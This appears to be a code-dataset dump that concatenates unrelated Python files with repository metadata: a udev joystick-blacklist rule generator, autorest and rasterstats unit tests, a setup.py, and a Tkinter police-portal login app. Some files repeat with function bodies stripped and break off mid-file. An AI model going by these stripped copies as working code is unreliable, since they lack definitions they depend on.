('09da', '8090'), # A4 Tech Co., Ltd X-718BK Oscar Optical Gaming Mouse
('09da', '9033'), # A4 Tech Co., X7 X-705K
('09da', '9066'), # A4 Tech Co., Sharkoon Fireglider Optical
('09da', '9090'), # A4 Tech Co., Ltd XL-730K / XL-750BK / XL-755BK Laser Mouse
('09da', '90c0'), # A4 Tech Co., Ltd X7 G800V keyboard
('09da', 'f012'), # A4 Tech Co., Ltd Bloody V7 mouse
('09da', 'f32a'), # A4 Tech Co., Ltd Bloody B540 keyboard
('09da', 'f613'), # A4 Tech Co., Ltd Bloody V2 mouse
('09da', 'f624'), # A4 Tech Co., Ltd Bloody B120 Keyboard
('1b1c', '1b3c'), # Corsair Harpoon RGB gaming mouse
('1d57', 'ad03'), # [T3] 2.4GHz and IR Air Mouse Remote Control
('1e7d', '2e4a'), # Roccat Tyon Mouse
('20a0', '422d'), # Winkeyless.kr Keyboards
('2516', '001f'), # Cooler Master Storm Mizar Mouse
('2516', '0028'), # Cooler Master Storm Alcor Mouse
]
def write_mode_0000_udev_rule_file(path, devices, message):
filename = os.path.basename(path)
with open(path, 'w') as f:
f.write('# /etc/udev/rules.d/' + filename + '\n' + message + '\n')
for vendor, product in devices:
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", ENV{ID_INPUT_JOYSTICK}=="?*", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", KERNEL=="js[0-9]*", MODE="0000", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
def write_rm_udev_rule_file(path, devices, message):
filename = os.path.basename(path)
with open(path, 'w') as f:
f.write('# /etc/udev/rules.d/' + filename + '\n' + message + '\n')
for vendor, product in devices:
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", ENV{ID_INPUT_JOYSTICK}=="?*", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
f.write('SUBSYSTEM=="input", ATTRS{idVendor}=="%s", ATTRS{idProduct}=="%s", KERNEL=="js[0-9]*", RUN+="/bin/rm %%E{DEVNAME}", ENV{ID_INPUT_JOYSTICK}=""\n' % (vendor, product))
def main():
common_header = textwrap.dedent('''\
#
# This file is auto-generated. For more information:
# https://github.com/denilsonsa/udev-joystick-blacklist
''')
write_mode_0000_udev_rule_file('51-these-are-not-joysticks.rules', DEVICES, common_header)
write_rm_udev_rule_file('51-these-are-not-joysticks-rm.rules', DEVICES, common_header)
# See: https://github.com/denilsonsa/udev-joystick-blacklist/issues/20
devices_except_microsoft = [dev for dev in DEVICES if dev[0] != '045e']
write_mode_0000_udev_rule_file('after_kernel_4_9/51-these-are-not-joysticks.rules', devices_except_microsoft, common_header)
write_rm_udev_rule_file('after_kernel_4_9/51-these-are-not-joysticks-rm.rules', devices_except_microsoft, common_header)
if __name__ == '__main__':
main()
| 1,903 | 0 | 69 |
6bf3de2c08c19066ab234342ae66eb72ed2ff3e6 | 1,517 | py | Python | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 35 | 2018-04-03T12:15:53.000Z | 2022-03-11T14:03:34.000Z | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 652 | 2017-08-28T22:44:41.000Z | 2022-03-31T21:20:31.000Z | test/unittests/test_autorest_api.py | qwordy/autorest.python | 6b12df51c2a39a1285546b5a771b69f5896e794f | [
"MIT"
] | 29 | 2017-08-28T20:57:01.000Z | 2022-03-11T14:03:38.000Z | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from autorest.jsonrpc.localapi import LocalAutorestAPI
| 34.477273 | 76 | 0.630191 | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
from autorest.jsonrpc.localapi import LocalAutorestAPI
def test_get_bool():
api = LocalAutorestAPI()
api.values = {
'bool': True,
'boolfalse': False,
'strtrue': 'true',
'strfalse': 'boo',
'inttrue': 1,
'intfalse': 42,
'dashdash': {}
}
assert api.get_boolean_value('nothere') is None
assert api.get_boolean_value('nothere', True) is True
assert api.get_boolean_value('bool') is True
assert api.get_boolean_value('bool', False) is True
assert api.get_boolean_value('boolfalse') is False
assert api.get_boolean_value('boolfalse', True) is False
assert api.get_boolean_value('strtrue') is True
assert api.get_boolean_value('strtrue', False) is True
assert api.get_boolean_value('strfalse') is False
assert api.get_boolean_value('strfalse', True) is False
assert api.get_boolean_value('inttrue') is True
assert api.get_boolean_value('inttrue', False) is True
assert api.get_boolean_value('intfalse') is False
assert api.get_boolean_value('intfalse', True) is False
assert api.get_boolean_value('dashdash') is True
assert api.get_boolean_value('dashdash', False) is True
| 1,129 | 0 | 23 |
208b4494095e6039959b5dae0d5bb99bbacfa658 | 1,209 | py | Python | setup.py | tdcosim/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 16 | 2019-04-09T19:37:38.000Z | 2020-10-31T04:17:37.000Z | setup.py | sibyjackgrove/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 10 | 2019-07-24T16:40:33.000Z | 2021-02-04T20:31:53.000Z | setup.py | tdcosim/SolarPV-DER-simulation-utility | 03fb1cfd4d255117faced84cf61cd5b7ae59f69f | [
"BSD-3-Clause"
] | 4 | 2019-09-10T20:14:42.000Z | 2020-07-25T23:50:09.000Z | import os
from setuptools import setup
# The text of the README file
f=open(os.path.join(os.path.dirname(os.path.abspath(__file__)),'README.md'))
README=f.read()
f.close()
setup(name='pvder',
version=open("pvder/_version.py").readlines()[-1].split()[-1].strip("\"'"),
packages=['pvder',],
include_package_data=True,
description='Utility for simulating PV-DER',
long_description=README,
long_description_content_type="text/markdown",
url ='https://github.com/tdcosim/SolarPV-DER-simulation-tool',
author = 'Siby Jose Plathottam',
author_email='sibyjackgrove@gmail.com',
license= 'LICENSE.txt',
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
],
install_requires=['scipy>=1.0.0','numpy>=1.15.1','matplotlib>=2.0.2'],#And any other dependencies required
extras_require={"docs": ['sphinx-rtd-theme','nbsphinx','nbsphinx-link'],
"numba":['numba>=0.53.0']}
)
| 37.78125 | 112 | 0.634409 | import os
from setuptools import setup
# The text of the README file
f=open(os.path.join(os.path.dirname(os.path.abspath(__file__)),'README.md'))
README=f.read()
f.close()
setup(name='pvder',
version=open("pvder/_version.py").readlines()[-1].split()[-1].strip("\"'"),
packages=['pvder',],
include_package_data=True,
description='Utility for simulating PV-DER',
long_description=README,
long_description_content_type="text/markdown",
url ='https://github.com/tdcosim/SolarPV-DER-simulation-tool',
author = 'Siby Jose Plathottam',
author_email='sibyjackgrove@gmail.com',
license= 'LICENSE.txt',
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Science/Research',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
],
install_requires=['scipy>=1.0.0','numpy>=1.15.1','matplotlib>=2.0.2'],#And any other dependencies required
extras_require={"docs": ['sphinx-rtd-theme','nbsphinx','nbsphinx-link'],
"numba":['numba>=0.53.0']}
)
| 0 | 0 | 0 |
2e003daec1ca05e555a7434ce8e3784ed2e0b0ae | 11,929 | py | Python | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | 1 | 2017-10-15T15:52:14.000Z | 2017-10-15T15:52:14.000Z | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | null | null | null | tests/test_zonal.py | andreas-h/python-raster-stats | 41d252c69c4a233ebc60f0569bd8286e9526d3db | [
"BSD-3-Clause"
] | null | null | null | # test zonal stats
import os
import pytest
from osgeo import ogr
from rasterstats import raster_stats, stats_to_csv, RasterStatsError
from rasterstats.main import VALID_STATS
from rasterstats.utils import shapely_to_ogr_type, parse_geo, get_ogr_ds, \
OGRError, feature_to_geojson, bbox_to_pixel_offsets
from shapely.geometry import shape, box
import json
DATA = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
raster = os.path.join(DATA, 'slope.tif')
### Different geometry types
# Test multigeoms
## Geo interface
import shapefile
## Categorical
## Utils
| 37.161994 | 346 | 0.672563 | # test zonal stats
import os
import pytest
from osgeo import ogr
from rasterstats import raster_stats, stats_to_csv, RasterStatsError
from rasterstats.main import VALID_STATS
from rasterstats.utils import shapely_to_ogr_type, parse_geo, get_ogr_ds, \
OGRError, feature_to_geojson, bbox_to_pixel_offsets
from shapely.geometry import shape, box
import json
DATA = os.path.join(os.path.dirname(os.path.abspath(__file__)), "data")
raster = os.path.join(DATA, 'slope.tif')
def test_main():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster)
for key in ['__fid__', 'count', 'min', 'max', 'mean']:
assert stats[0].has_key(key)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_zonal_global_extent():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster)
global_stats = raster_stats(polygons, raster, global_src_extent=True)
assert stats == global_stats
def test_global_non_ogr():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = (x.shape for x in reader.shapeRecords())
with pytest.raises(RasterStatsError):
raster_stats(geoms, raster, global_src_extent=True)
def test_zonal_nodata():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, nodata_value=0)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_doesnt_exist():
nonexistent = os.path.join(DATA, 'DOESNOTEXIST.shp')
with pytest.raises(RasterStatsError):
raster_stats(nonexistent, raster)
def test_nonsense():
polygons = os.path.join(DATA, 'polygons.shp')
with pytest.raises(RasterStatsError):
raster_stats("blaghrlargh", raster)
with pytest.raises(RasterStatsError):
raster_stats(polygons, "blercherlerch")
with pytest.raises(RasterStatsError):
raster_stats(["blaghrlargh",], raster)
### Different geometry types
def test_points():
points = os.path.join(DATA, 'points.shp')
stats = raster_stats(points, raster)
# three features
assert len(stats) == 3
# three pixels
assert sum([x['count'] for x in stats]) == 3
assert round(stats[0]['mean'], 3) == 11.386
assert round(stats[1]['mean'], 3) == 35.547
def test_points_categorical():
points = os.path.join(DATA, 'points.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(points, categorical_raster, categorical=True)
# three features
assert len(stats) == 3
assert not stats[0].has_key('mean')
assert stats[0][1.0] == 1
assert stats[1][2.0] == 1
def test_lines():
lines = os.path.join(DATA, 'lines.shp')
stats = raster_stats(lines, raster)
assert len(stats) == 2
assert stats[0]['count'] == 58
assert stats[1]['count'] == 32
# Test multigeoms
def test_multipolygons():
multipolygons = os.path.join(DATA, 'multipolygons.shp')
stats = raster_stats(multipolygons, raster)
assert len(stats) == 1
assert stats[0]['count'] == 125
def test_multilines():
multilines = os.path.join(DATA, 'multilines.shp')
stats = raster_stats(multilines, raster)
assert len(stats) == 1
# can differ slightly based on platform/gdal version
assert stats[0]['count'] in [89, 90]
def test_multipoints():
multipoints = os.path.join(DATA, 'multipoints.shp')
stats = raster_stats(multipoints, raster)
assert len(stats) == 1
assert stats[0]['count'] == 3
## Geo interface
import shapefile
def test_iterable_geoms_geo():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = (x.shape for x in reader.shapeRecords())
stats = raster_stats(geoms, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_iterable_features_geo():
    # Grr pyshp doesn't do feature-level geo_interface so we need to construct it
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
features = []
class FeatureThing(object):
pass
fields = reader.fields[1:]
field_names = [field[0] for field in fields]
for sr in reader.shapeRecords():
geom = sr.shape.__geo_interface__
atr = dict(zip(field_names, sr.record))
obj = FeatureThing()
obj.__geo_interface__ = dict(geometry=geom,properties=atr,type="Feature")
features.append(obj)
stats = raster_stats(features, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_single_geo():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_geolike():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape.__geo_interface__ for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_iterable_geolike():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [x.shape.__geo_interface__ for x in reader.shapeRecords()]
stats = raster_stats(geoms, raster)
assert len(stats) == 2
assert stats[0]['count'] == 75
assert stats[1]['count'] == 50
def test_single_wkt():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [shape(x.shape).wkt for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_wkb():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [shape(x.shape).wkb for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
def test_single_jsonstr():
reader = shapefile.Reader(os.path.join(DATA, 'polygons.shp'))
geoms = [json.dumps(x.shape.__geo_interface__) for x in reader.shapeRecords()]
stats = raster_stats(geoms[0], raster)
assert len(stats) == 1
assert stats[0]['count'] == 75
## Categorical
def test_categorical():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, categorical=True)
assert len(stats) == 2
assert stats[0][1.0] == 75
assert stats[1].has_key(5.0)
## Utils
def test_nopoints():
with pytest.raises(TypeError):
shapely_to_ogr_type('Point')
with pytest.raises(TypeError):
shapely_to_ogr_type('MultiPoint')
def test_jsonstr():
jsonstr = '{"type": "Polygon", "coordinates": [[[244697.45179524383, 1000369.2307574936], [244827.15493968062, 1000373.0455558595], [244933.9692939227, 1000353.9715640305], [244933.9692939227, 1000353.9715640305], [244930.15449555693, 1000147.9724522779], [244697.45179524383, 1000159.4168473752], [244697.45179524383, 1000369.2307574936]]]}'
assert parse_geo(jsonstr)
def test_ogr_ds_nonstring():
a = box(0,1,2,3)
with pytest.raises(OGRError):
get_ogr_ds(a)
def test_ogr_geojson():
polygons = os.path.join(DATA, 'polygons.shp')
ds = ogr.Open(polygons)
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
res = feature_to_geojson(feat)
assert res['type'] == 'Feature'
def test_ogr_geojson_nogeom():
polygons = os.path.join(DATA, 'polygons.shp')
ds = ogr.Open(polygons)
lyr = ds.GetLayer(0)
feat = lyr.GetNextFeature()
feat.SetGeometryDirectly(None)
res = feature_to_geojson(feat)
assert res['type'] == 'Feature'
assert res['geometry'] == None
def test_specify_stats_list():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats=['min', 'max'])
assert sorted(stats[0].keys()) == sorted(['__fid__', 'min', 'max'])
assert 'count' not in stats[0].keys()
def test_specify_all_stats():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='ALL')
assert sorted(stats[0].keys()) == sorted(VALID_STATS + ["__fid__"])
stats = raster_stats(polygons, raster, stats='*')
assert sorted(stats[0].keys()) == sorted(VALID_STATS + ["__fid__"])
def test_specify_stats_string():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='min max')
assert sorted(stats[0].keys()) == sorted(['__fid__', 'min', 'max'])
assert 'count' not in stats[0].keys()
def test_specify_stats_invalid():
polygons = os.path.join(DATA, 'polygons.shp')
with pytest.raises(RasterStatsError):
raster_stats(polygons, raster, stats='foo max')
def test_optional_stats():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats='min max sum majority median std')
assert stats[0]['min'] <= stats[0]['median'] <= stats[0]['max']
def test_no_copy_properties():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, copy_properties=False) # default
assert not stats[0].has_key('id') # attr from original shp
def test_copy_properties():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, copy_properties=True)
assert stats[0].has_key('id') # attr from original shp
def test_range():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats="range min max")
for stat in stats:
assert stat['range'] == stat['max'] - stat['min']
ranges = [x['range'] for x in stats]
# without min/max specified
stats = raster_stats(polygons, raster, stats="range")
assert not stats[0].has_key('min')
assert ranges == [x['range'] for x in stats]
def test_csv():
polygons = os.path.join(DATA, 'polygons.shp')
stats = raster_stats(polygons, raster, stats="*")
csv = stats_to_csv(stats)
assert csv.split()[0] == ','.join(sorted(VALID_STATS + ['__fid__']))
def test_categorical_csv():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, categorical=True)
csv = stats_to_csv(stats)
assert csv.split()[0] == "1.0,2.0,5.0,__fid__"
def test_nodata_value():
polygons = os.path.join(DATA, 'polygons.shp')
categorical_raster = os.path.join(DATA, 'slope_classes.tif')
stats = raster_stats(polygons, categorical_raster, stats="*",
categorical=True, nodata_value=1.0)
assert stats[0]['majority'] == None
assert stats[0]['count'] == 0 # no pixels; they're all null
assert stats[1]['minority'] == 2.0
assert stats[1]['count'] == 49 # used to be 50 if we allowed 1.0
assert not stats[0].has_key('1.0')
def test_partial_overlap():
polygons = os.path.join(DATA, 'polygons_partial_overlap.shp')
stats = raster_stats(polygons, raster, stats="count")
for res in stats:
# each polygon should have at least a few pixels overlap
assert res['count'] > 0
def test_no_overlap():
polygons = os.path.join(DATA, 'polygons_no_overlap.shp')
stats = raster_stats(polygons, raster, stats="count")
for res in stats:
# no polygon should have any overlap
assert res['count'] is None
def test_bbox_offbyone():
# Make sure we don't get the off-by-one error in calculating src offset
rgt = (-4418000.0, 250.0, 0.0, 4876500.0, 0.0, -250.0)
geom_bounds = [4077943.9961, -3873500.0, 4462000.0055, -3505823.7582]
so = bbox_to_pixel_offsets(rgt, geom_bounds)
rsize = (37000, 35000)
assert so[1] + so[3] == rsize[1]
| 10,401 | 0 | 918 |
6d1b5b98c7991420db6dcbac8a7dd1b5def81cfc | 10,802 | py | Python | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | login_page_first.py | proacc2022/NCDS | 45afffa5c90cd5cc0cf9fc199349c2b6040c37f5 | [
"MIT"
] | null | null | null | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
from PIL import Image,ImageTk
import os
import sqlite3
import datetime
from civilian_home import civ_home
from acp_home import acp_home
from constable_home import const_home
from sys_home import system_home
connection = sqlite3.connect('NCD.db')
cursor = connection.cursor()
xtr=str(datetime.datetime.now())
cursor.execute('CREATE TABLE IF NOT EXISTS POLICE(POLICEID TEXT PRIMARY KEY CHECK(POLICEID <> ""), PASSWORD TEXT NOT NULL CHECK(PASSWORD <> ""),FNAME TEXT NOT NULL CHECK(FNAME <> ""), MNAME TEXT, LNAME TEXT NOT NULL CHECK(LNAME <> ""), PHOTO BLOB NOT NULL, LASTLOGIN TEXT, EMAILID TEXT NOT NULL CHECK(EMAILID <> ""), JURISDICTION TEXT NOT NULL CHECK(JURISDICTION <> ""), ADDRESS TEXT NOT NULL CHECK(ADDRESS <> ""), GENDER TEXT NOT NULL CHECK(GENDER <> ""), DOB TEXT NOT NULL CHECK(DOB <> ""), BATCH TEXT NOT NULL CHECK(BATCH <> ""), RANK TEXT NOT NULL CHECK(RANK <> ""), MARITALSTATUS TEXT NOT NULL)')
cursor.execute("""CREATE TABLE IF NOT EXISTS POLICE1(POLICEID TEXT, CONTACT TEXT NOT NULL, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS COMPLAINT (COMPLAINT_NO text PRIMARY KEY, PLACEOFCRIME text NOT NULL CHECK(PLACEOFCRIME <> ''), TIMEOFCRIME text, CRIMEDESCRIPTION text, CITY text, POLICESTATION text, STATUS text, VFNAME text, VMNAME text, VLNAME text, AFNAME text, AMNAME text, ALNAME text, USERID text, FOREIGN KEY(USERID) REFERENCES CIVILIAN1(USERID))""")
cursor.execute("""CREATE TABLE IF NOT EXISTS CIVILIAN1 (USERID text PRIMARY KEY CHECK(USERID <> ''), PASSWORD text NOT NULL CHECK(PASSWORD <> ''), FNAME text, MNAME text, LNAME text, DOB text, GENDER text, MARITALSTATUS text, EMAILID text NOT NULL, OCCUPATION text, ADDRESS text, LASTLOGIN text, PHOTO blob)""")
cursor.execute('CREATE TABLE IF NOT EXISTS CIVILIAN2 (USERID text , CONTACT number,FOREIGN KEY (USERID) REFERENCES CIVILIAN1(USERID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL(CRIMINALID number PRIMARY KEY, FNAME text, MNAME text, LNAME text, DOB text, BLOODGROUP text, STATUS text, PRIORITY number, GENDER text, PHOTO BLOB NOT NULL)')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE1 (CASENO number PRIMARY KEY, PENALCODETYPE text, SECTIONNUMBER number, POLICESTATION text, DESCRIPTION text NOT NULL, OPENDATE text NOT NULL, CLOSEDATE text, COMPLAINT_NO TEXT, FOREIGN KEY (COMPLAINT_NO) REFERENCES COMPLAINT(COMPLAINT_NO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL3 (CRIMINALID text, CONTACT text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE2(CASENO number, POLICEID text, FOREIGN KEY (POLICEID) REFERENCES POLICE(POLICEID), FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE3(CASENO number , VFNAME text, VMNAME text, VLNAME text, VAGE number, VADDRESS text, FOREIGN KEY (CASENO) REFERENCES CASE1(CASENO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CASE4(CASENO number, FIRNO number, FOREIGN KEY(CASENO) REFERENCES CASE1(CASENO), FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL2(CRIMINALID text, ADDRESS text, FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIMINAL1 (CRIMINALID text, IDENTIFICATIONMARKS text,FOREIGN KEY (CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME2 (FIRNO number, CRIMINALID number, FOREIGN KEY(FIRNO) REFERENCES CRIME(FIRNO), FOREIGN KEY(CRIMINALID) REFERENCES CRIMINAL(CRIMINALID))')
cursor.execute('CREATE TABLE IF NOT EXISTS CRIME3 (FIRNO number, PENALCODETYPE text, SECTIONNUMBER number, FOREIGN KEY (FIRNO) REFERENCES CRIME(FIRNO))')
cursor.execute( 'CREATE TABLE IF NOT EXISTS CRIME(FIRNO number PRIMARY KEY, DAMAGEAMOUNT number, INJURED number, DEATHS number, DATEOFCRIME text NOT NULL, PLACEOFCRIME text)')
connection.commit()
t=tk.Tk()
t.title('NCDS')
t.configure(background = 'white')
#t.geometry("1500x800+30+30")
w, h = t.winfo_screenwidth(), t.winfo_screenheight()
t.geometry("%dx%d+0+0" % (w, h))
#fontStyle = tkFont.Font(family="Times New Roman", size=60)
OptionList=['Police','Civilian']
v = tk.StringVar(t)
v.set('Select User Type'.upper())
opt = tk.OptionMenu(t, v, *OptionList)
fing=tkFont.Font(family="Times New Roman", size=16)
opt.configure(relief="solid",font=tkFont.Font(family="Times New Roman", size=20))
impmsg=Label(t, text='WELCOME TO POLICE PORTAL',bg='black', fg='white',font=tkFont.Font(family="Times New Roman", size=60), borderwidth=2, relief="solid")
wanted=Label(t, text='T O P W A N T E D', fg='red',font=tkFont.Font(family="Times New Roman", size=40), borderwidth=2, relief="solid")
detail=Label(t, text='Enter Below details to Login',bg='white',fg='black',font=tkFont.Font(family="Times New Roman", size=20), borderwidth=2, relief="solid")
user=Label(t, text='USER ID ',font=fing,borderwidth=2, relief="solid")
password=Label(t, text='PASSWORD',font=fing, borderwidth=2,relief="solid")
uid=Entry(t,font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
pswd=Entry(t,show='*',font=tkFont.Font(family="Times New Roman", size=30), borderwidth=2, relief="solid")
submit=Button(t, text='SUBMIT', command=enter,font=fing, borderwidth=2, relief="solid")
reset=Button(t, text='CLEAR', command=clear,font=fing, borderwidth=2, relief="solid")
signup=Button(t, text='REGISTER', command=register, borderwidth=2, relief="solid")
close=Button(t, text='EXIT', command=close, font=fing,borderwidth=2, relief="solid")
signup.configure(font=("Times New Roman",25,'bold'))
f=cursor.execute('SELECT PHOTO from CRIMINAL order by priority')
temp=f.fetchall()
plist=[]
if len(temp)>=6:
for i in range(6):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
else:
for i in range(len(temp)):
path = "z" + str(i) + '.jpg'
with open(path, 'wb') as file:
file.write(temp[i][0])
plist.append(path)
for i in range (len(temp)-1,6):
plist.append('demo.jpg')
t.load1 = Image.open(plist[0])
t.load1 = t.load1.resize((200, 200), Image.ANTIALIAS)
t.photo1 = ImageTk.PhotoImage(t.load1, master=t)
t.img1 = Label(t, image=t.photo1, borderwidth=2, relief="solid")
t.img1.image = t.photo1
t.load2 = Image.open(plist[1])
t.load2 = t.load2.resize((200, 200), Image.ANTIALIAS)
t.photo2 = ImageTk.PhotoImage(t.load2, master=t)
t.img2 = Label(t, image=t.photo2, borderwidth=2, relief="solid")
t.img2.image = t.photo2
t.load3 = Image.open(plist[2])
t.load3 = t.load3.resize((200, 200), Image.ANTIALIAS)
t.photo3 = ImageTk.PhotoImage(t.load3, master=t)
t.img3 = Label(t, image=t.photo3, borderwidth=2, relief="solid")
t.img3.image = t.photo3
t.load4 = Image.open(plist[3])
t.load4 = t.load4.resize((200, 200), Image.ANTIALIAS)
t.photo4 = ImageTk.PhotoImage(t.load4, master=t)
t.img4 = Label(t, image=t.photo4, borderwidth=2, relief="solid")
t.img4.image = t.photo4
t.load5 = Image.open(plist[4])
t.load5 = t.load5.resize((200, 200), Image.ANTIALIAS)
t.photo5 = ImageTk.PhotoImage(t.load5, master=t)
t.img5 = Label(t, image=t.photo5, borderwidth=2, relief="solid")
t.img5.image = t.photo5
t.load6 = Image.open(plist[5])
t.load6 = t.load6.resize((200, 200), Image.ANTIALIAS)
t.photo6 = ImageTk.PhotoImage(t.load6, master=t)
t.img6 = Label(t, image=t.photo6, borderwidth=2, relief="solid")
t.img6.image = t.photo6
impmsg.place(x=0, y=5, width=w, height=100)
wanted.place(x=600, y=160, width=800, height=70)
detail.place(x=90 , y=200, width=410, height=75)
opt.place(x = 90, y = 300 , width=410, height=70)
user.place(x = 90, y = 380 , width=200, height=70)
uid.place(x = 300, y = 380 , width=200, height=70)
password.place(x = 90, y = 460 , width=200, height=70)
pswd.place(x = 300, y = 460 , width=200, height=70)
submit.place(x = 90, y = 540, width=200, height=70)
reset.place(x = 300, y = 540 , width=200, height=70)
signup.place(x= 90, y = 630, width = 200, height = 70)
close.place(x= 300, y = 630, width = 200, height = 70)
t.img1.place(x = 600, y = 250 , width=200, height=200)
t.img2.place(x = 900, y = 250 , width=200, height=200)
t.img3.place(x = 1200, y = 250 , width=200, height=200)
t.img4.place(x = 600, y = 500 , width=200, height=200)
t.img5.place(x = 900, y = 500 , width=200, height=200)
t.img6.place(x = 1200, y = 500 , width=200, height=200)
mainloop()
| 47.79646 | 602 | 0.669413 | from tkinter import *
import tkinter as tk
import tkinter.messagebox
import tkinter.font as tkFont
from PIL import Image,ImageTk
import os
import sqlite3
import datetime
from civilian_home import civ_home
from acp_home import acp_home
from constable_home import const_home
from sys_home import system_home
connection = sqlite3.connect('NCD.db')
cursor = connection.cursor()
xtr=str(datetime.datetime.now())
